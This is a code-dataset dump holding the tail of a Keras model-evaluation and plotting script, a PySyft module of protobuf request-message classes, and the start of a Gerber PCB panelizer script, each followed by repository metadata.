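        model.add(Dense(nn_nodes[1], activation='sigmoid'))
        model.add(Dense(nn_nodes[2], activation='sigmoid'))
        model.compile(loss='binary_crossentropy', optimizer='rmsprop',
                      metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
        model.fit(X_tr, Y_tr, epochs=epochs, batch_size=batch_size, verbose=0,
                  sample_weight=w_tr, shuffle=True, validation_split=0.2, callbacks=[es])
        acc[i], auc[i], sens[i], spec[i], pr[i], f1[i], cost[i] = model_eval(
            model, X_te, Y_te, w_te, exp, X_tr, Y_tr, w_tr)
    save_print(auc, sens, spec, pr, f1, cost, exp)
# Example (assumption): run_experiment('0101', class_weights=(0, 1, 3), nn_nodes=(6, 3, 1))
# ---------------------------------------------------------------------------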
#print([np.mean(np.fromiter(np.load('cost_saved_1111.npy').item().values(), dtype=float)),np.std(np.fromiter(np.load('cost_saved_1111.npy').item().values(), dtype=float))])
AUC_1111=np.fromiter(np.load('AUC_test_1111.npy').item().values(), dtype=float)
AUC_1110=np.fromiter(np.load('AUC_test_1110.npy').item().values(), dtype=float)
AUC_1011=np.fromiter(np.load('AUC_test_1011.npy').item().values(), dtype=float)
AUC_0111=np.fromiter(np.load('AUC_test_0111.npy').item().values(), dtype=float)
AUC_1101=np.fromiter(np.load('AUC_test_1101.npy').item().values(), dtype=float)
cs_1111=np.fromiter(np.load('cost_saved_1111.npy').item().values(), dtype=float)
cs_1110=np.fromiter(np.load('cost_saved_1110.npy').item().values(), dtype=float)
cs_1011=np.fromiter(np.load('cost_saved_1011.npy').item().values(), dtype=float)
cs_0111=np.fromiter(np.load('cost_saved_0111.npy').item().values(), dtype=float)
cs_1101=np.fromiter(np.load('cost_saved_1101.npy').item().values(), dtype=float)
f1_1111=np.fromiter(np.load('f1_score_1111.npy').item().values(), dtype=float)
f1_1110=np.fromiter(np.load('f1_score_1110.npy').item().values(), dtype=float)
f1_1011=np.fromiter(np.load('f1_score_1011.npy').item().values(), dtype=float)
f1_0111=np.fromiter(np.load('f1_score_0111.npy').item().values(), dtype=float)
f1_1101=np.fromiter(np.load('f1_score_1101.npy').item().values(), dtype=float)
#aucs_mean = [np.mean(AUC_1111), np.mean(AUC_1110)]
#aucs_std = [np.std(AUC_1111), np.std(AUC_1110)]
df_results = pd.DataFrame(np.array([[np.mean(AUC_1111), np.mean(AUC_1110),np.mean(AUC_0111),np.mean(AUC_1011),np.mean(AUC_1101)], \
[np.mean(f1_1111), np.mean(f1_1110), np.mean(f1_0111), np.mean(f1_1011), np.mean(f1_1101)], \
[np.mean(cs_1111), np.mean(cs_1110),np.mean(cs_0111),np.mean(cs_1011),np.mean(cs_1101)], \
]))
df_std = pd.DataFrame(np.array([[np.std(AUC_1111), np.std(AUC_1110), np.std(AUC_0111), np.std(AUC_1011), np.std(AUC_1101)], \
                                [np.std(f1_1111), np.std(f1_1110), np.std(f1_0111), np.std(f1_1011), np.std(f1_1101)], \
                                [np.std(cs_1111), np.std(cs_1110), np.std(cs_0111), np.std(cs_1011), np.std(cs_1101)], \
                                ]))
df_results.index = ['ROC AUC','F1 score','Cost saved']
df_results.columns = ['Complete Model', 'Without CA', 'Without HDF', 'Without MDF','Without LSTM']
#patterns = (('/'),('o'))
colors=['blue','skyblue','silver','gray', 'black']
fig, ax = plt.subplots()
#plt.rcParams.update({'figure.figsize': [5, 5], 'font.size': 22})
plt.rcParams.update({'font.size': 20, 'figure.figsize': [10,8]})
ax = df_results[::-1].plot.barh(ax=ax, xerr=np.array(df_std[::-1]).transpose(),color=colors,width=0.7,capsize=5)
ax.legend(bbox_to_anchor=(0.95, 0.30))
#ax.set_xlabel('F1 score / Cost Savings')
plt.tight_layout()
# Save the figure before showing it so the rendered plot is written to disk
plt.savefig('fig3.pdf', format='pdf', dpi=1000)
plt.show()
#SIGNIFICANCE TESTS
#label='cost_saved'
#c=np.fromiter(np.load(label+'_1110.npy').item().values(), dtype=float)
#d=np.fromiter(np.load(label+'_1111.npy').item().values(), dtype=float)
#a,b=stats.ttest_ind(c,d)
#print(a,b)
#import scipy.io as sio
#y_pred = model.predict(X_test).ravel()
#sio.savemat('y_pred_new_review2.mat', {'y_pred':y_pred,'Visit_ID':Visit_test.ravel(),'Y_test':Y_test.ravel(),'Sample':Sample_weight_test.ravel()})
| 45.169897
| 434
| 0.712652
| 6,197
| 39,614
| 4.302888
| 0.056802
| 0.112957
| 0.041178
| 0.054903
| 0.851341
| 0.838927
| 0.8057
| 0.80015
| 0.796287
| 0.792087
| 0
| 0.033292
| 0.146211
| 39,614
| 876
| 435
| 45.221461
| 0.7551
| 0.091155
| 0
| 0.758953
| 0
| 0
| 0.081638
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011019
| false
| 0
| 0.026171
| 0
| 0.048209
| 0.118457
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c048e47bcd8104839104ec01ab44cde0de4c98fe
| 31,537
|
py
|
Python
|
packages/syft/src/syft/core/node/common/node_service/object_request/object_request_messages.py
|
pculliton/PySyft
|
23a0d1442d3d901b1139aeabe079ccf4177ebc0d
|
[
"Apache-2.0"
] | 2
|
2022-02-18T03:48:27.000Z
|
2022-03-05T06:13:57.000Z
|
packages/syft/src/syft/core/node/common/node_service/object_request/object_request_messages.py
|
pculliton/PySyft
|
23a0d1442d3d901b1139aeabe079ccf4177ebc0d
|
[
"Apache-2.0"
] | 3
|
2021-11-17T15:34:03.000Z
|
2021-12-08T14:39:10.000Z
|
packages/syft/src/syft/core/node/common/node_service/object_request/object_request_messages.py
|
pculliton/PySyft
|
23a0d1442d3d901b1139aeabe079ccf4177ebc0d
|
[
"Apache-2.0"
] | null | null | null |
# stdlib
import json
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
# third party
from google.protobuf.reflection import GeneratedProtocolMessageType
from typing_extensions import final
# relative
from ...... import serialize
from ......proto.grid.messages.request_messages_pb2 import (
CreateRequestMessage as CreateRequestMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
CreateRequestResponse as CreateRequestResponse_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
DeleteRequestMessage as DeleteRequestMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
DeleteRequestResponse as DeleteRequestResponse_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
GetRequestMessage as GetRequestMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
GetRequestResponse as GetRequestResponse_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
GetRequestsMessage as GetRequestsMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
GetRequestsResponse as GetRequestsResponse_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
UpdateRequestMessage as UpdateRequestMessage_PB,
)
from ......proto.grid.messages.request_messages_pb2 import (
UpdateRequestResponse as UpdateRequestResponse_PB,
)
from .....common.message import ImmediateSyftMessageWithReply
from .....common.message import ImmediateSyftMessageWithoutReply
from .....common.serde.deserialize import _deserialize
from .....common.serde.serializable import serializable
from .....common.uid import UID
from .....io.address import Address
@serializable()
@final
class CreateRequestMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
content: Dict,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.content = content
def _object2proto(self) -> CreateRequestMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: CreateRequestMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return CreateRequestMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
content=json.dumps(self.content),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: CreateRequestMessage_PB,
) -> "CreateRequestMessage":
"""Creates a CreateRequestMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of CreateRequestMessage
:rtype: CreateRequestMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return CreateRequestMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
content=json.loads(proto.content),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return CreateRequestMessage_PB
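# Hedged usage sketch (comment only, not part of the original module): a local
# roundtrip through the helpers defined above, assuming `addr` is an Address
# obtained elsewhere (e.g. from a node's own address in tests).
#   msg = CreateRequestMessage(address=addr, content={"reason": "demo"}, reply_to=addr)
#   pb = msg._object2proto()                        # -> CreateRequestMessage_PB
#   restored = CreateRequestMessage._proto2object(pb)
#   assert restored.content == msg.content          # content survives the JSON roundtrip
# In application code, the public serialize(msg) / syft.deserialize(...) entry
# points mentioned in the docstrings should be preferred over these internals.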
@serializable()
@final
class CreateRequestResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: Dict,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> CreateRequestResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
        :rtype: CreateRequestResponse_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return CreateRequestResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
content=json.dumps(self.content),
)
@staticmethod
def _proto2object(
proto: CreateRequestResponse_PB,
) -> "CreateRequestResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of CreateRequestResponse
        :rtype: CreateRequestResponse
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return CreateRequestResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=json.loads(proto.content),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return CreateRequestResponse_PB
@serializable()
@final
class GetRequestMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
request_id: str,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.request_id = request_id
def _object2proto(self) -> GetRequestMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: GetRequestMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetRequestMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
request_id=json.dumps(self.request_id),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: GetRequestMessage_PB,
) -> "GetRequestMessage":
"""Creates a GetRequestMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of GetRequestMessage
:rtype: GetRequestMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetRequestMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
request_id=json.loads(proto.request_id),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetRequestMessage_PB
@serializable()
@final
class GetRequestResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
request_id: Dict[str, Any],
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.request_id = request_id
def _object2proto(self) -> GetRequestResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
        :rtype: GetRequestResponse_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetRequestResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
request_id=json.dumps(self.request_id),
)
@staticmethod
def _proto2object(
proto: GetRequestResponse_PB,
) -> "GetRequestResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of GetRequestResponse
        :rtype: GetRequestResponse
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetRequestResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
request_id=json.loads(proto.request_id),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetRequestResponse_PB
@serializable()
@final
class GetRequestsMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
def _object2proto(self) -> GetRequestsMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: GetRequestsMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return GetRequestsMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: GetRequestsMessage_PB,
) -> "GetRequestsMessage":
"""Creates a GetRequestsMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of GetRequestsMessage
:rtype: GetRequestsMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetRequestsMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetRequestsMessage_PB
@serializable()
@final
class GetRequestsResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
content: List[Dict],
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.content = content
def _object2proto(self) -> GetRequestsResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
        :rtype: GetRequestsResponse_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
msg = GetRequestsResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
)
for content in self.content:
msg.content.append(serialize(content))
return msg
@staticmethod
def _proto2object(
proto: GetRequestsResponse_PB,
) -> "GetRequestsResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of GetRequestsResponse
        :rtype: GetRequestsResponse
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return GetRequestsResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
content=[_deserialize(content) for content in proto.content],
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return GetRequestsResponse_PB
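# Hedged note (not in the original source): unlike the scalar fields above,
# GetRequestsResponse serializes its `content` list item by item via
# serialize()/_deserialize(), so each entry must itself be syft-serializable
# (plain Python dicts may need wrapping in syft's Dict type). Sketch:
#   resp = GetRequestsResponse(address=addr, status_code=200, content=entries)
#   same = GetRequestsResponse._proto2object(resp._object2proto())
#   # len(same.content) == len(entries), with each entry deserialized back
# where `addr` and `entries` are assumptions standing in for real values.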
@serializable()
@final
class UpdateRequestMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
request_id: str,
status: str,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.request_id = request_id
self.status = status
def _object2proto(self) -> UpdateRequestMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: UpdateRequestMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return UpdateRequestMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
request_id=json.dumps(self.request_id),
status=json.dumps(self.status),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: UpdateRequestMessage_PB,
) -> "UpdateRequestMessage":
"""Creates a UpdateRequestMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of UpdateRequestMessage
:rtype: UpdateRequestMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return UpdateRequestMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
request_id=json.loads(proto.request_id),
status=json.loads(proto.status),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return UpdateRequestMessage_PB
@serializable()
@final
class UpdateRequestResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
status: str,
request_id: str,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.status = status
self.request_id = request_id
def _object2proto(self) -> UpdateRequestResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
        :rtype: UpdateRequestResponse_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return UpdateRequestResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
status=json.dumps(self.status),
request_id=json.dumps(self.request_id),
)
@staticmethod
def _proto2object(
proto: UpdateRequestResponse_PB,
) -> "UpdateRequestResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of UpdateRequestResponse
        :rtype: UpdateRequestResponse
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return UpdateRequestResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
request_id=json.loads(proto.request_id),
status=json.loads(proto.status),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return UpdateRequestResponse_PB
@serializable()
@final
class DeleteRequestMessage(ImmediateSyftMessageWithReply):
def __init__(
self,
address: Address,
request_id: str,
reply_to: Address,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
self.request_id = request_id
def _object2proto(self) -> DeleteRequestMessage_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
:rtype: DeleteRequestMessage_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return DeleteRequestMessage_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
request_id=json.dumps(self.request_id),
reply_to=serialize(self.reply_to),
)
@staticmethod
def _proto2object(
proto: DeleteRequestMessage_PB,
) -> "DeleteRequestMessage":
"""Creates a DeleteRequestMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of DeleteRequestMessage
:rtype: DeleteRequestMessage
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return DeleteRequestMessage(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
request_id=json.loads(proto.request_id),
reply_to=_deserialize(blob=proto.reply_to),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return DeleteRequestMessage_PB
@serializable()
@final
class DeleteRequestResponse(ImmediateSyftMessageWithoutReply):
def __init__(
self,
address: Address,
status_code: int,
request_id: str,
msg_id: Optional[UID] = None,
):
super().__init__(address=address, msg_id=msg_id)
self.status_code = status_code
self.request_id = request_id
def _object2proto(self) -> DeleteRequestResponse_PB:
"""Returns a protobuf serialization of self.
As a requirement of all objects which inherit from Serializable,
this method transforms the current object into the corresponding
Protobuf object so that it can be further serialized.
:return: returns a protobuf object
        :rtype: DeleteRequestResponse_PB
.. note::
This method is purely an internal method. Please use serialize(object) or one of
the other public serialization methods if you wish to serialize an
object.
"""
return DeleteRequestResponse_PB(
msg_id=serialize(self.id),
address=serialize(self.address),
status_code=self.status_code,
request_id=json.dumps(self.request_id),
)
@staticmethod
def _proto2object(
proto: DeleteRequestResponse_PB,
) -> "DeleteRequestResponse":
"""Creates a SignalingOfferMessage from a protobuf
As a requirement of all objects which inherit from Serializable,
this method transforms a protobuf object into an instance of this class.
        :return: returns an instance of DeleteRequestResponse
        :rtype: DeleteRequestResponse
.. note::
This method is purely an internal method. Please use syft.deserialize()
if you wish to deserialize an object.
"""
return DeleteRequestResponse(
msg_id=_deserialize(blob=proto.msg_id),
address=_deserialize(blob=proto.address),
status_code=proto.status_code,
request_id=json.loads(proto.request_id),
)
@staticmethod
def get_protobuf_schema() -> GeneratedProtocolMessageType:
"""Return the type of protobuf object which stores a class of this type
As a part of serialization and deserialization, we need the ability to
lookup the protobuf object type directly from the object type. This
static method allows us to do this.
Importantly, this method is also used to create the reverse lookup ability within
the metaclass of Serializable. In the metaclass, it calls this method and then
it takes whatever type is returned from this method and adds an attribute to it
with the type of this class attached to it. See the MetaSerializable class for
details.
:return: the type of protobuf object which corresponds to this class.
:rtype: GeneratedProtocolMessageType
"""
return DeleteRequestResponse_PB
| 40.851036
| 92
| 0.675683
| 3,658
| 31,537
| 5.715965
| 0.041279
| 0.033478
| 0.017217
| 0.015304
| 0.851691
| 0.844947
| 0.838204
| 0.838204
| 0.834091
| 0.807356
| 0
| 0.001297
| 0.266639
| 31,537
| 771
| 93
| 40.904021
| 0.902759
| 0.491423
| 0
| 0.653333
| 1
| 0
| 0.014406
| 0.004654
| 0
| 0
| 0
| 0
| 0
| 1
| 0.106667
| false
| 0
| 0.064
| 0
| 0.277333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c068031093fb5e76e9cac4f5afb5226a3803ef65
| 34,182
|
py
|
Python
|
PcbFile.py
|
halfmarble/halfmarble-panelizer
|
73489a0b5d0d46e6d363f6d14454d91fab62f8e3
|
[
"MIT"
] | null | null | null |
PcbFile.py
|
halfmarble/halfmarble-panelizer
|
73489a0b5d0d46e6d363f6d14454d91fab62f8e3
|
[
"MIT"
] | 5
|
2022-01-15T13:32:54.000Z
|
2022-01-30T15:18:15.000Z
|
PcbFile.py
|
halfmarble/halfmarble-panelizer
|
73489a0b5d0d46e6d363f6d14454d91fab62f8e3
|
[
"MIT"
] | null | null | null |
# The MIT License (MIT)
# Copyright 2021,2022 HalfMarble LLC
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import math
from os.path import join
from kivy.uix.image import Image
from kivy.graphics import Scale, Rectangle, Line
import Utilities
from hm_gerber_tool import PCB
from hm_gerber_tool.render import theme
from hm_gerber_tool.layers import PCBLayer
from hm_gerber_tool.render import GerberCairoContext, theme
from hm_gerber_tool.common import rs274x
from hm_gerber_tool.common import excellon
from Constants import *
from Utilities import *
from OffScreenImage import *
def log_text(progressbar, text=None, value=None):
if progressbar is not None:
Utilities.update_progressbar(progressbar, text, value)
elif text is not None:
print(text)
def generate_pcb_data_layers(cwd, pcb_rel_path, data_rel_path, progressbar=None, board_name=None):
pcb_path = os.path.abspath(os.path.join(cwd, pcb_rel_path))
data_path = os.path.abspath(os.path.join(cwd, data_rel_path))
progressbar_value = 0.1
try:
os.mkdir(data_path)
except FileExistsError:
pass
